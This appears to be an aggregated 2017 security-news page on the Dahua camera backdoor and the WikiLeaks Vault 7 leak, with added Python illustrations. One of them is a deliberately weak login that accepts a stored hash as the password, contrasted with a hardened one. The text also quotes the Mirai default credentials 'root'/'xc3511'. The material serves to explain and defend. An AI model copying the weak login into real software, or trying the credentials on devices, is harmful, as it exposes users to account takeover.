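    """Summarise a batch: how many URLs were upgraded vs left on plain HTTP."""
    upgraded = sum(1 for u in urls if upgrade_url(u)[1] is not None)
    return {"upgraded": upgraded, "untouched": len(urls) - upgraded}


if __name__ == "__main__":
    for sample in ["http://example.com/login", "http://status.example.com/",
                   "http://blog.example.org/post?id=1", "http://legacy.example.net/"]:
        print(sample, "->", upgrade_url(sample))
```

The thing to notice is that every decision is driven by a curated per-site rule: a host that no rule covers stays on plain HTTP, and a path the site serves only over HTTP has to be excluded explicitly or the rewrite would break it. That dependence on what each website actually supports is the limitation described in the paragraph above.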

Many of these privacy-centric tools and software rely on IP changing tactics, masking your traffic, or securing your connections via a number of channels. You might not think you’re a target for hackers, but based on the indiscriminate hacking that is going on nowadays, it pays to take precautions.


Dahua Video Recorders and Cameras affected by a serious flaw. Is it a backdoor?
8.3.2017 securityaffairs Vulnerebility

The manufacturer Dahua Technology has started releasing firmware updates to fix a serious flaw in some models of its video recorders and IP cameras.
Security experts believe the flaw is a true backdoor that could be used to remotely access the user database containing usernames and hashed passwords.

The backdoor was discovered by a researcher who is known online as “bashis.”

Once the attacker obtains the administrator credentials stored in the database, they can be used to log in to the device. Representatives of Dahua acknowledged the issue and classified it as a ‘coding issue’ that was not introduced intentionally.

Of course, the researcher who discovered the flaw is skeptical of the claim that it was an error.

According to an analysis shared by IPVM, the password hashes can be used directly to log in; there is no need to crack them.

Bashis did not report the issue to Dahua before disclosing it; he also released proof-of-concept (PoC) exploit code, which he later removed at the manufacturer’s request.

The researcher will make the PoC available online again on April 5.

Dahua replied with a security bulletin that admits the presence of the error in the code of its devices.

“We were recently made aware of a cybersecurity vulnerability that affects certain Dahua recorders and IP cameras. It’s important to note that the vulnerability is not the result of a malicious attack on any specific installation where our products are deployed; it was discovered by Bashis conducting independent testing of various suppliers’ surveillance products.” reads the security bulletin.

The company published a list of vulnerable devices; users are invited to download and update the firmware of their devices.

Model Number                                               Where to Update Firmware
DH-IPC-HDW23A0RN-ZS, DH-IPC-HDBW23A0RN-ZS                  Download Link
DH-IPC-HDBW13A0SN, DH-IPC-HDW13A0SN, DH-IPC-HFW13A0SN-W    Download Link
DH-IPC-HDBW13A0SN, DH-IPC-HDW13A0SN, DH-IPC-HFW13A0SN-W    Download Link
DHI-HCVR51A04HE-S3                                         Download Link
DHI-HCVR51A08HE-S3                                         Download Link
DHI-HCVR58A32S-S2                                          Download Link

Dahua is still investigating the issue; it is likely that other devices are affected by the same flaw.

The security of IoT devices is crucial; recently I exclusively reported the news of a large-scale attack launched by a criminal gang leveraging the SSH TCP direct forward attack technique through a thingbot.

According to a report published by Flashpoint, the recent Mirai botnet attacks involved a huge number of Dahua devices.

The researchers explained that the botnet was mainly composed of video surveillance devices manufactured by Dahua Technology.

“While investigating the recent large-scale distributed denial-of-service (DDoS) attacks, Flashpoint identified the primary manufacturer of the devices that utilize the default username and password combination known as root and xc3511,” reads the report published by Flashpoint. “The Dahua devices were identified early because of their distinctive interface and recent use in other botnets. Utilizing the “Low Impact Identification Tool” or LIFT, Flashpoint was able to identify a large number of these devices in the attack data provided.”


American hackers can pose as Russians, WikiLeaks documents suggest

8.3.2017 Novinky/Bezpečnost BigBrother
Documents published by the WikiLeaks organization indicate that the CIA has a special hacking unit that has adopted the techniques of its foreign counterparts in Russia and China. This means that after attacks on information systems it can leave behind their traces and thus shift the blame onto them. The unit is called Umbrage. The authenticity of the documents has not yet been confirmed, however.
If the information is confirmed, though, it will have a fundamental impact on the investigation of the alleged Russian hacking attacks during the American election campaign that aimed to influence its outcome. For the public it would de facto mean only one thing: it can believe whomever it wants, because anyone can lie, the Wired site noted.

ČTK noted in this context that American media compare the digital traces in question to, for example, bullets found at a crime scene, which forensic experts are able to match unambiguously to a specific weapon.

Speculation as to whether the CIA fabricated the attacks from Russia in an attempt to prevent Donald Trump's election to the White House surfaced immediately after WikiLeaks published nearly nine thousand pages of documents.

The whole matter can also be turned around, however. There has been speculation in the media from the very beginning that the classified American documents are being deliberately handed to WikiLeaks by the Russians.

The documents published on Tuesday also mention that the CIA is able to turn almost any smart electronic device into a spying tool, whether it is an iPhone, a mobile phone running the Android operating system, a Windows computer or a Samsung television.

In total, WikiLeaks is said to have nearly 9,000 new documents at its disposal. That is more than former CIA contractor Edward Snowden handed over to reporters.


Leading manufacturers respond to the CIA data leak

8.3.2017 Novinky/Bezpečnost BigBrother
Apple, Samsung and Microsoft respond to the current Wikileaks vs. CIA affair.

On Tuesday the Wikileaks portal published thousands of CIA documents describing the cyber-espionage techniques by which intelligence officers, through flaws in the software of smartphones or televisions, illegally eavesdropped on targets around the world.

And while at the political level world leaders argue about the authenticity of the information, the leading manufacturers of the allegedly exploited devices have already commented on the scandal.

The most detailed statement came from Apple, according to which the technology used in iPhones currently represents “the best possible security”, adding that the company continues to work on improving it further. Nearly 80% of iPhone owners are running the most current operating system.

“Our initial analysis showed that a large part of the gaps that were supposedly exploited were patched in the latest update, and if we come across any new ones, we will start working on them immediately. We always urge our customers to download the latest version of iOS so that their devices are secured as well as possible,” says Apple's statement.

Samsung, whose F8000 series televisions the CIA is said to have broken into using software developed with the participation of Britain's MI5, was briefer.

“Protecting the privacy of our customers is our top priority. We therefore immediately began looking into the published information.”

According to the documents, however, the CIA also developed malware meant to attack computers running the Windows operating system, to which Microsoft responded similarly briefly, saying it is already “looking into the matter”. Those who have not yet commented on the affair are Google and the Linux Foundation – the CIA is said to have attacked both Android phones and computers running Linux distributions.

The CIA itself has not yet confirmed the authenticity of the documents, dated 2013 to 2016, but its former director Michael Hayden stated that if they are genuine, such a leak represents a reduction in the security of both the United States and its allies. Experts agree, however, that there is nothing surprising about it.

“It's not that the CIA spies on people. Of course it spies on them. After all, that's its job. What should be addressed first and foremost is that someone broke into its system, pulled out lots of material and showed it to the world. And now the world wants to know who it was, how they did it and why,” commented Nicholas Weaver, a security expert at the Institute of Computer Science in Berkeley.

What is also certain is that a leak of data describing the intelligence officers' classified methods in detail represents a huge problem for the CIA. Not only because a data leak from an agency that is supposed to obtain data from others is a kind of humiliation, but also because sensitive targets can now very easily change their habits to make the intelligence officers' work even harder.


Backdoor Found in Dahua Video Recorders, Cameras

8.3.2017 securityweek Vulnerebility
Video surveillance company Dahua Technology has started releasing firmware updates to address a serious vulnerability in some of its video recorders and IP cameras.

The flaw was discovered by a researcher with the online moniker “bashis.” The expert, who has classified the issue as a backdoor, noticed that he could remotely download a device’s complete user database, including usernames and password hashes.

The administrator credentials stored in the database can be used to log in to the device. IPVM reported that the password hashes can be used directly to log in, without the need to crack them (i.e., a pass-the-hash attack).
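Both Dahua write-ups on this page make the same point: the leaked hashes work as credentials directly, so a dumped user database is as good as the passwords themselves. The following Python example, added here and not taken from Dahua's firmware or from either article, contrasts a login design with that property against one in which nothing stored in the user database can be replayed as a credential. The database layout, the user name and the password are constructed for the example.

```python
"""Constructed illustration of the design flaw behind a pass-the-hash login.
Nothing here is Dahua's code or data format; the records are invented."""
import hashlib
import hmac
import os

# --- Weak design: the client proves knowledge of the password by sending
# H(password) and the server compares it with the value it stores. The
# stored value therefore IS the credential, whatever the hash function. ---

def weak_hash(password: str) -> str:
    # Unsalted, single-round hash (assumed for the example). Note the flaw
    # is not the choice of hash function but that the hash is accepted as-is.
    return hashlib.sha256(password.encode()).hexdigest()


def weak_login(db: dict, username: str, supplied_hash: str) -> bool:
    record = db.get(username)
    if record is None:
        return False
    return hmac.compare_digest(record["hash"], supplied_hash)


# --- Hardened design: the server stores a salted, iterated derivation and
# the client sends the password itself (over a TLS-protected channel). A
# leaked record lets an attacker attempt offline guessing, but it can not
# be replayed as a login credential. -------------------------------------

ITERATIONS = 100_000


def make_record(password: str) -> dict:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt.hex(), "hash": digest.hex()}


def hardened_login(db: dict, username: str, password: str) -> bool:
    record = db.get(username)
    if record is None:
        # Do a dummy derivation so an unknown user costs as much as a wrong
        # password (avoids a timing-based user-enumeration side channel).
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\0" * 16, ITERATIONS)
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(record["salt"]), ITERATIONS)
    return hmac.compare_digest(digest.hex(), record["hash"])


# Constructed user databases with an invented administrator password.
ADMIN_PASSWORD = "c0rrect-horse-battery"          # constructed
WEAK_DB = {"admin": {"hash": weak_hash(ADMIN_PASSWORD)}}
HARDENED_DB = {"admin": make_record(ADMIN_PASSWORD)}


def leaked_record_allows_login() -> tuple:
    """Model the failure mode the articles describe: someone holds only the
    dumped database record, not the password. Returns
    (weak_design_accepts_stored_hash, hardened_design_accepts_stored_hash)."""
    weak = weak_login(WEAK_DB, "admin", WEAK_DB["admin"]["hash"])
    hardened = hardened_login(HARDENED_DB, "admin", HARDENED_DB["admin"]["hash"])
    return weak, hardened


if __name__ == "__main__":
    print("stored hash usable as credential (weak, hardened):", leaked_record_allows_login())
    print("real password accepted by hardened design:",
          hardened_login(HARDENED_DB, "admin", ADMIN_PASSWORD))
```

The same flaw survives a challenge-response protocol if the response is keyed on the stored value: whatever the server keeps in its database must never be sufficient, on its own, to complete a login. When reviewing an embedded device or any service, the check is simply whether a copy of the user table lets you authenticate without ever learning a password.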

Bashis did not notify Dahua before making his findings public, but he did remove the proof-of-concept (PoC) code he had released at the vendor’s request. The PoC will be made public again on April 5.

In the meantime, Dahua has published a security bulletin to warn customers of the vulnerability. The company said the flaw had been caused by a “small piece of code.”

“It’s important to note that the vulnerability is not the result of a malicious attack on any specific installation where our products are deployed; it was discovered by Bashis conducting independent testing of various suppliers' surveillance products,” the company said.

Dahua has so far identified 11 affected IP cameras and video recorders, and released firmware updates for them. The company’s investigation is ongoing and other impacted devices could be discovered in the upcoming days.

It’s important that users update the firmware on their devices as Dahua products are often targeted by Internet of Things (IoT) botnets. Researchers reported last year that many of the devices hijacked by the BASHLITE and Mirai botnets had been surveillance products from Dahua.


Security Firms Assess Impact of CIA Leak

8.3.2017 securityweek BigBrothers
Security firms have started assessing the impact of the CIA hacking tools exposed on Tuesday by WikiLeaks as part of the leak dubbed “Vault 7.”

Files allegedly obtained from a high-security CIA network appear to show that the intelligence agency has tools for hacking everything, including mobile devices, desktop computers, routers, smart TVs and cars.

The published files also appear to show that the CIA has targeted the products of many security solutions providers, including anti-malware and secure messaging applications. The list of affected vendors includes Symantec, Kaspersky, Avira, F-Secure, Microsoft, Bitdefender, Panda Security, Trend Micro, ESET, Avast, AVG, McAfee, Comodo and G Data.

While WikiLeaks has not released any of the exploits it has obtained, an initial investigation conducted by security firms indicates that the CIA’s capabilities may not be as advanced as some have suggested.

Rob Graham (@ErrataRob) commented on Twitter on 8 March 2017:

“...in 2017, phones with "monitor mode" are now some CIA cyber super weapon” https://twitter.com/wikileaks/status/839210002694942725

“..what Wikileaks won't tell you: almost everything in their dump is dreadfully ordinary, widely known by the cybersec/hacking community”

Bitdefender told SecurityWeek that the public Vault 7 files show that the CIA had been having problems evading the company’s products.

Kaspersky Lab said one of the vulnerabilities mentioned in the report was patched in 2009, while another was addressed in December 2015.

“All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release. The products mentioned in the Wikileaks report (KIS 7, KIS 8, WKSTN MP3) are outdated versions of Kaspersky Lab software and have been out of the technical support lifecycle for several years,” the security firm said in an emailed statement.

“We would like to stress that the documents published by Wikileaks do not describe any computer breaches against Kaspersky Lab, or against any other security firms or customers, but instead depict efforts to reverse engineer and find vulnerabilities in computer security software products,” it added.

Comodo also said its product appeared to pose problems to the CIA. WikiLeaks mentioned that the agency had bypassed Comodo’s product by hiding malware in the Recycle Bin, but the vendor said such tricks would not have worked against versions of its product released in the past four years.

“What we are seeing in the leaked documents are their desperate attempts to build a hack, step-by-step, with the ultimate goal of achieving a total bypass of the security, such as trying to find something like a kernel exploit. But as their email says, in the case of Comodo, they end up with nothing,” said Melih Abdulhayoglu, founder and CEO of Comodo.

Microsoft, whose EMET and Security Essentials products are mentioned in the leak, told SecurityWeek that it’s aware of the report and looking into it. Trend Micro and F-Secure are also investigating.

“F-Secure is mentioned in the leak, citing the CIA can potentially bypass some of our products. But the question is really not whether the CIA can bypass our products, the answer to that is always yes. If they cannot do it right now, they invest another million to find a flaw,” said F-Secure’s Mikko Hypponen.

Panda Security says it has yet to find exploits or tools targeting its products in the publicly available files.

“That doesn't mean there won't be any, at the end of the day we are talking about software. We expected to be there, the fact that we do not collaborate in any way to spy on our users turns Panda into a target for the CIA, FSB, and that kind of organizations,” said Luis Corrons, Technical Director of PandaLabs.

As for enterprise security vendors, Juniper Networks has not found any evidence that its products have been targeted, but there appear to be several exploits targeting Cisco devices. Cisco has yet to release any information.

Secure messaging tools not compromised

WikiLeaks reported that the CIA had found a way to bypass the encryption of Signal, Telegram, WhatsApp and other secure messaging applications.

While many jumped to conclude that the agency had actually broken the encryption of these apps, WikiLeaks actually meant that gaining access to a mobile device using iOS and Android exploits could have given the CIA access to conversations, without having to break their encryption.


Wikileaks CIA Files – What this means for Internet security and encryption
8.3.2017 securityaffairs BigBrothers

Earlier today, Wikileaks dumped a large database of secret documents from the CIA in a release dubbed Vault7. Here we do a deeper analysis of the leak and the broader implications for online security and encrypted services.
Our in-depth analysis of the leaked CIA files is found at the bottom of this post. First, we will discuss the main question on everybody’s mind – how are encrypted services like ProtonMail impacted, and what insights did we gain into the strategies of state-backed attackers.

No, Encryption Is Not Dead
Immediately after the news broke, stories began circulating, along the lines of “Signal/Whatsapp encryption broken!”, fueled in part by Tweets put out by Wikileaks. This was followed predictably by online chatter speculating into whether or not ProtonMail had been cracked.

We can state quite unequivocally that there is nothing in the leaked CIA files which indicates any sort of crack of ProtonMail’s encryption. And despite claims to the contrary, there is also no evidence that Signal/Whatsapp end-to-end encryption has been breached. Here’s what we do know:

Over the past three years, the CIA has put together a formidable arsenal of cyberweapons specially designed to gain surveillance capabilities over end-user devices such as mobile phones and laptop/desktop computers. These advanced malware tools enable the CIA to record actions such as keystrokes on a mobile device, allowing them to conduct surveillance without breaking encryption. Through this technique, US intelligence agencies can gain access to data before it has been encrypted. This is in fact the only way to achieve data access, because cracking the cryptography used in advanced secure communication services such as ProtonMail and Signal is still impractical with current technology.

In other words, the core cryptographic algorithms and techniques used by ProtonMail and other encrypted services remain secure. The exploitation of user endpoints (mobile phones, personal computers, etc) is actually not a new technique, but one that has existed since the first malware was created. This unfortunately is not something that cryptography is designed to defend against, as encryption by itself cannot guarantee the security of end-user devices. What the CIA files dumped by Wikileaks do reveal however, is a monumental shift in strategy since the last disclosure of this kind was made by Edward Snowden in 2013.

State-backed Cyberattack Strategy is Changing
ProtonMail is a tool that is used by millions of people around the world to ensure the security of their email communications. In addition to ordinary people and businesses, ProtonMail is also used by journalists, activists, and dissidents, who often require protection from government surveillance for their personal safety. Because of these factors, we make it our business to carefully study and understand state adversaries in order to better protect our userbase.

The Wikileaks CIA files are therefore a comprehensive update on state cyberwarfare strategies since Snowden gave us the first edition. In fact, the trends that the files reveal are arguably global, since it is highly probable that other major players in this space (Russia, China, UK, Israel, etc) will have independently reached the same conclusions regarding overall strategy.

Some of the most interesting revelations from the Snowden leaks were the extent to which the NSA actively sought out information from the US tech giants, either with consent, or even without consent. This made a lot of sense, because the biggest global databases of sensitive personal data do not belong to the NSA, but to companies like Google and Facebook, who have already shown ample willingness to exploit such data for profit, sometimes via unscrupulous means.

Since 2013 however, the world has changed. Consumer and business awareness of online privacy and security is at an all time high, and more and more people around the world are increasingly choosing more secure services which respect privacy. Today, end-to-end encryption has gone mainstream, and services such as ProtonMail and Whatsapp boast millions of regular people as users. The use of end-to-end encryption means services such as ProtonMail are not actually able to decrypt user data. Even if we wanted to compromise user data, we do not have the technical means to decrypt the user emails. Furthermore, even if an attacker breached ProtonMail servers, all the emails stored on our servers are encrypted, so an attacker also would not be able to read user emails.

It’s clear from the leaked CIA documents that as the world has changed, state-backed cyberattackers have also evolved. As we describe below, the varied leaked files are tied together by a common thread – an almost singular focus on producing malware to attack end-user devices. This is a logical response to the rise of end-to-end encrypted services such as ProtonMail. Services such as ProtonMail have significantly raised the barrier for obtaining data directly from the service provider, and many services are now based outside of the United States, beyond the reach of legal coercion. As such, it has now become easier and more productive to hack individual users directly.

This opens up a terrifying new narrative where government spies are actively deploying viruses and trojans against their own citizens, joining the ranks of common cybercriminals. While this is by no means good news for privacy rights worldwide, it is, in some ways, a win for privacy tech, because governments are having to shift away from mass surveillance and towards more targeted surveillance. In short, services such as ProtonMail are doing exactly what they were designed to do, which is raising barriers to large-scale mass surveillance.

Our initial analysis into the Wikileaks CIA documents can be found below. Questions can be directed to media@protonmail.ch. If you would like to start benefiting from secure email, you can get a free ProtonMail account here.

Best Regards,
The ProtonMail Team

ProtonMail Analysis of Wikileaks CIA Documents
#Vault7 in a sentence: It is a leak about the CIA’s hacking arsenal used against foreign governments and citizens both domestically and abroad.

Name of the database: Vault7. It is the first part in a series of leaks titled Year Zero.

Origin: CIA’s Center for Cyber Intelligence unit in Langley, Virginia USA

Volume: 7,818 web pages with 943 attachments. According to WikiLeaks, the entire archive of CIA material consists of several hundred million lines of computer code. Estimated to be bigger than the Snowden leaks (unconfirmed).

Dates of documents: 2013-2016, from the time Snowden left the intelligence community until 2016.

Intention: the source of the information told WikiLeaks in a statement that they wish to initiate a public debate about the “security, creation, use, proliferation and democratic control of cyber weapons.”

How is it different from the Snowden leaks: Snowden leaks exposed the NSA and its techniques of blanket surveillance on citizens and governments around the world. Vault7, on the other hand, exposes the CIA and what technologies it uses in cyber warfare against foreign governments as well as against targeted individuals.

What did we learn so far?
As we are examining the documents, we have identified that the leak concerns the CIA and what cyber weapons it uses. Over the next weeks we will continue to verify and update the information. Below is what we know so far about the programs used by the CIA, legality of the operations, and what this means for your privacy and security.

Programs used by the CIA
Weeping Angel – It is a program that transforms the microphones of smart TVs into surveillance tools. By manipulating the hardware, CIA hackers are able to turn on people’s smart TVs and listen to users’ conversations. In effect, Weeping Angel transforms smart TVs into bugs.

Our team quickly drew parallels between Weeping Angel and other surveillance tools described by Snowden. Weeping Angel is a technique that bears close resemblance to Nosey Smurf, a tool used by the UK’s GCHQ to turn on a phone’s microphone and use it for audio surveillance. Tracker Smurf, meanwhile, is a geo-location tool that offers a more accurate method of locating a phone and its carrier than triangulation.

Zero day – Refers to a general type of vulnerability used by the CIA against any adversary’s device. WikiLeaks reports that Zero Day has been primarily used against companies in industrial espionage. In 2013, Snowden also revealed that the NSA was committing industrial espionage against Brazilian, Russian and European oil companies, banks, airlines and trade delegations. According to Vault7, the program produced over “a thousand hacking systems, trojans, viruses, and other “weaponized” malware.”

Hive is a multi-platform CIA malware suite that can be specifically utilized against states. “The project provides customizable implants for Windows, Solaris, MikroTik (used in internet routers) and Linux platforms and a Listening Post (LP)/Command and Control (C2) infrastructure to communicate with these implants.”

There are many parallels between Hive and Zero Day and the 2010 Stuxnet virus that attacked and infected the Iranian nuclear program. Although no state took responsibility for the attack in 2010, Stuxnet has been linked by political pundits to American and Israeli surveillance and intelligence agencies due to its degree of sophistication.

Hacking mobiles
Vault7 also reveals that the CIA has developed advanced capabilities for hacking mobile phones. The leaks show that the agency developed and used its tools primarily to control mobile phones and then extract data from them.

The CIA’s Mobile Development Branch (MDB) produces malware to pull data from iPhones and other Apple products running iOS, such as iPads. MDB also targets Android OS, which is a much more popular system than iOS and is the default operating system for the majority of smartphones, including Sony, Samsung and Google Pixel. “Year Zero” shows that as of 2016 the CIA had 24 “weaponized” Android “zero days” which it has developed itself and obtained from GCHQ, NSA and cyber arms contractors.

Framing other governments
We were alarmed by the discovery of a tool that allows the CIA to potentially frame foreign governments for its cyber warfare acts. It works as follows. Imagine that each government or hacking group has its own signature move or malicious software, or a combination of both, that it uses to attack its targets. After a while, whenever an attack occurs, it can be linked to that group based on that fingerprint.

WikiLeaks reports that a program run by its Remote Devices Branch called UMBRAGE “collects and stores an extensive library of attack techniques”. According to Vault7, the amassed techniques include those that are frequently used by Russia.

Some of the techniques currently at CIA’s disposal via UMBRAGE include: keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.

Vault7 reveals that the CIA has also produced rules on how its malware should be hidden when deployed to avoid any fingerprints leading back to the US or the agency.

Was this legal?
Preliminary findings reveal that the CIA had known about and enhanced the dissemination of these tools. In fact, according to WikiLeaks, the agency wanted the programs to be legal so that agents or CIA sponsored hackers can operate with full impunity.

According to Vault7, if CIA software were classified, officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. As a result, “the CIA has secretly made most of its cyber spying/war code unclassified”. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufacturers and computer hackers can freely “pirate” these ‘weapons’ if they are obtained. The CIA has primarily had to rely on obfuscation to keep its malware secret.

Why is this critical?
While we are still mapping the dangers of such findings and capabilities, some conclusions are clear.

The CIA can frame other governments
By using Hive and Zero Day, the US can wage a cyber attack against a nation state while purposefully leaving behind a trace that leads to another state. As governments around the world migrate their infrastructure control to cyber space – any cyber attack can have a devastating effect if targeted against hospitals, power plants or telecommunications providers.

CIA backdoors can be exploited by others
When the CIA undermines a service or a device, it creates a backdoor that can be abused by other parties. With the agency’s newly revealed tools, everything people do or say around their phones and TVs can create a very revealing and intimate picture of people’s lives.


Secdo Automates End-to-End Incident Response with Preemptive IR
8.3.2017 thehackernews Security


As vast volumes of digital data are created, consumed and shared by companies, customers, employees, patients, financial institutions, governments and so many other bodies, information protection becomes a growing risk for everyone.
Who wants to see personal customer purchasing data flying into the hands of strangers? What company can tolerate the pilfering of its intellectual property by competitors? What government can stand idly by while its military secrets are made public?
To protect their valuable and private information, organizations purchase numerous cyber security systems – like intrusion detection systems, firewalls, and anti-virus software – and deploy them across their networks and on all their computers.
In fact, a typical bank, manufacturer or government department might have dozens of such products operating at all times.
Cyber security systems work non-stop to thwart network infiltration and data-theft. Whenever they notice an activity that seems outside the scope of regular use, they issue an alert to notify cyber security personnel who investigate the reason for the alert and take remedial action if necessary.
For example, if someone tries to access a computer and repeatedly enters the wrong password, an alert will be issued. When an email attachment containing a virus is opened, another alarm will be raised.
Despite all of these security systems and their alerts, strong networks are breached, and the information is stolen. Why does this still happen?
Over-Detection and False Positives
Cyber security systems work by noticing unusual activities and behaviors of people and software. But they often get it wrong. Try as they may, in order to be ultra-careful, cyber security systems flag a lot of activities that they determine to be potentially malicious but, in reality, are not.
Yes, you keyed in your password three times until you got it right, but you aren’t a data pirate. That still causes an alert.
From your office computer, you inadvertently accessed a website that is off-limits to your company. Honest mistake, but another alert.
This happens so frequently that, every day, hundreds or even thousands of alerts turn out to be nothing of note.
Can you believe it? The average enterprise in the US receives more than 10,000 alerts every day. Most of them aren’t incidents that should demand attention. But how do you know until you look into them?
This daily load of false positives distracts cyber security professionals from dealing with legitimate security alerts.
As more and more time is wasted chasing after false positives, security staff have to resort to triage – that is, they try to figure out which alerts are important and require a response, and which ones are false and should be ignored. They aren't always accurate. Sometimes, an analyst spends weeks tracking down an incident that turns out to be irrelevant.
Conversely, sometimes, the alert that is ignored is the real emergency!
Distracted to Ruin
A good example that shows how false positives can be ruinous to an organization is the Target Data Breach.
Target, the second-largest discount-store retailer in the United States, was forced to admit to more than 70 million shoppers that their personal and financial information had been compromised.
With a large cybersecurity team and a significant budget for tools and technologies that protect data, how could this happen to Target? (Or Ebay? Or JP Morgan Chase? Or Yahoo?)
Target's problem wasn't that some sort of hacker had succeeded in bypassing its robust cyber security systems. In fact, the company's detection systems deployed specifically to monitor such intrusion attempts had generated alerts confirming that malicious software was present. So why wasn't it dealt with?
As these important alerts were buried among thousands of daily false positives, they did not achieve high enough attention to warrant the prompt action that they demanded. They were missed. This simple oversight led to one of the largest and most costly data breaches in history, estimated at more than $300 million!
In short, while detecting cyber threats and alerting security personnel is crucial, it is not nearly enough. Organizations must institute an accurate, real-time alert validation methodology that unfailingly determines which of the thousands of daily alerts deserve attention and which are just "noise."
But the devil is in the details.
Secdo Automates the Incident Response Process End to End
Secdo's Preemptive Incident Response platform automatically validates every single alert, distinguishing between false positives and real threats that deserve serious investigation.
Secdo provides all the context – the "who, what, where, when and how" – to help security analysts determine the severity of a real alert. Then, Secdo empowers security teams to respond quickly and precisely to combat the threat.
The Secdo platform comprises three modules:
Observer
Analyzer
Responder
Observer
According to Secdo, effective cyber security begins with preemptive data collection. Like a battery of digital cameras that see and record everything, Observer records and stores every activity that occurs on every endpoint (computer) and server (we call these "hosts") in the network.
Everything on every host, even when they number in the tens of thousands! Observer enables security and IT teams to see how any host, user, or process behaved now or in the past – just like the ability to view any video from any camera now or in the past at the click of a mouse.
Observer enables quick investigations and threat-hunting. It provides facilities for easy ad-hoc inquiries, enabling analysts to investigate any alert and hunt for threats effectively. Security analysts can use the intuitive investigation interface to ask questions about any event and always get a conclusive answer.
For example:
Who accessed the website www.youshouldnotgothere.ru on January 24th between 13:31 and 15:09?
Which hosts have file iamarealthreat.exe on their hard drive?
Which endpoints sent out companyfinancials.xlsx in emails last night?
Answers to these and other questions are displayed promptly and helpfully to the security analyst.

Results returned from an Observer inquiry
Analyzer
Non-stop, Analyzer correlates the mass of data stored by Observer. If Observer is like thousands of digital cameras recording everything, Analyzer is the intelligence that connects all the individual videos into coherent stories that can be reviewed anytime.
For example, malicious software from my boss’s computer is trying to send data out to a foreign website, an event that triggers an alert. It sounds like a simple case, but the full story might read like this:
"Yesterday, I received an email from a particular address. I clicked on the attachment, looked at it, and thought about it no more. However, unbeknownst to me, the attachment wrote a bit of malware on my hard drive. Two hours later, it started to search my computer until it found a password file that enabled it to jump to my boss’s computer. There, at midnight, the malware woke up, searched my boss’s hard drive until it found a file called secretcompanyplans.docx. It connected to a website in Ukraine and attempted to send the file. This is what triggered the alert."
The security analyst will see the limited information in the alert which says: "The boss’s endpoint attempted to connect to www.ohnodontgothere.ua."
How can the analyst know the entire story of the alert in order to understand that there is an attachment to an email on my computer that started the whole incident?
Merely preventing access to the bad website will not eradicate the danger. Perhaps this piece of malware is so smart that it will wake up again and try some other tricks like sending another file to a different website. That will just trigger another alert and require another security analyst to fix the same problem tomorrow.
The full story is necessary to fix the entire problem once and for all.
Secdo's Analyzer helps analysts get to the root of every problem and understand its full scope so they can remediate it at its root cause.
Analyzer's Causality Engine places all events received from the Observer data into causality chains (the story) in anticipation of alerts, preparing the forensics that will be necessary for any future security investigation.
As alerts are triggered from any source (any of the many cyber security systems that the organization has deployed), Analyzer automatically correlates the alerts with their appropriate causality chains, placing them into their full context. IT and security teams are able to see the chain of events (the entire story) of exactly what happened from this moment backward into the past.
With the full context, Analyzer can accurately distinguish false alerts so that analysts don’t have to endure unnecessary distractions. It accurately prioritizes and presents each genuine alert, displaying the entire context including the attack chain starting from root cause (how did this incident start?), all entities involved (where has it spread?) and damage assessment (what did the bad guys do to us so far?) – the entire story.
With all this information presented graphically before their very eyes, security analysts can properly analyze real alerts and respond correctly in seconds.

Analyzer presents a graphic representation of the entire causality chain including root cause
In our example, Secdo would enable the analyst to see that the malicious attachment on my computer started the entire chain of events, that it jumped to my boss's computer and that both malicious processes must be cleaned as well as other files or commands they might have written and anything else that is pertinent to this incident.
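The causality-chain idea described above, as an added illustration that is not Secdo's code: constructed endpoint telemetry (process starts, file reads and writes, a logon to another host, outbound connections) is indexed ahead of time, and an alert is then walked back through parent processes and across the cross-host hop to its root cause. The verdict heuristic (dropped executable or lateral movement means "investigate") is an assumption for the example, not the product's logic.

```python
from collections import defaultdict

# Constructed telemetry, not Secdo's format. Each tuple is
# (host, ts, pid, ppid, image, kind, detail). The first two hosts replay the
# article's story; hr-pc is a benign browser visit that also raised an alert.
EVENTS = [
    ("my-pc",   "2017-03-07T09:00", 100, 1,   "explorer.exe", "start",   ""),
    ("my-pc",   "2017-03-07T09:02", 200, 100, "outlook.exe",  "start",   ""),
    ("my-pc",   "2017-03-07T09:05", 300, 200, "winword.exe",  "start",   "invoice.docm"),
    ("my-pc",   "2017-03-07T09:05", 300, 200, "winword.exe",  "write",   "C:\\Users\\me\\AppData\\upd.exe"),
    ("my-pc",   "2017-03-07T09:06", 400, 300, "upd.exe",      "start",   ""),
    ("my-pc",   "2017-03-07T11:06", 400, 300, "upd.exe",      "read",    "C:\\Users\\me\\passwords.txt"),
    ("my-pc",   "2017-03-07T11:07", 400, 300, "upd.exe",      "logon",   "boss-pc"),
    ("boss-pc", "2017-03-07T11:07", 500, 1,   "svc.exe",      "start",   "remote from my-pc"),
    ("boss-pc", "2017-03-08T00:00", 500, 1,   "svc.exe",      "read",    "D:\\plans\\secretcompanyplans.docx"),
    ("boss-pc", "2017-03-08T00:01", 500, 1,   "svc.exe",      "connect", "www.ohnodontgothere.ua"),
    ("hr-pc",   "2017-03-07T10:00", 600, 1,   "explorer.exe", "start",   ""),
    ("hr-pc",   "2017-03-07T10:01", 700, 600, "chrome.exe",   "start",   ""),
    ("hr-pc",   "2017-03-07T10:02", 700, 600, "chrome.exe",   "connect", "www.youshouldnotgothere.ru"),
]


class Telemetry:
    """Indexes recorded host activity so a chain can be built when an alert arrives."""

    def __init__(self, events):
        self.starts = {}                  # (host, pid) -> start event
        self.by_proc = defaultdict(list)  # (host, pid) -> all events of that process
        self.logons = defaultdict(list)   # source host -> logon events to other hosts
        for ev in sorted(events, key=lambda e: e[1]):
            host, _, pid, _, _, kind, _ = ev
            self.by_proc[(host, pid)].append(ev)
            if kind == "start":
                self.starts[(host, pid)] = ev
            elif kind == "logon":
                self.logons[host].append(ev)

    def causality_chain(self, host, pid):
        """Walk from the alerted process back to its root, following parent pids
        and, for a remotely started process, the logon on the source host."""
        chain, seen = [], set()
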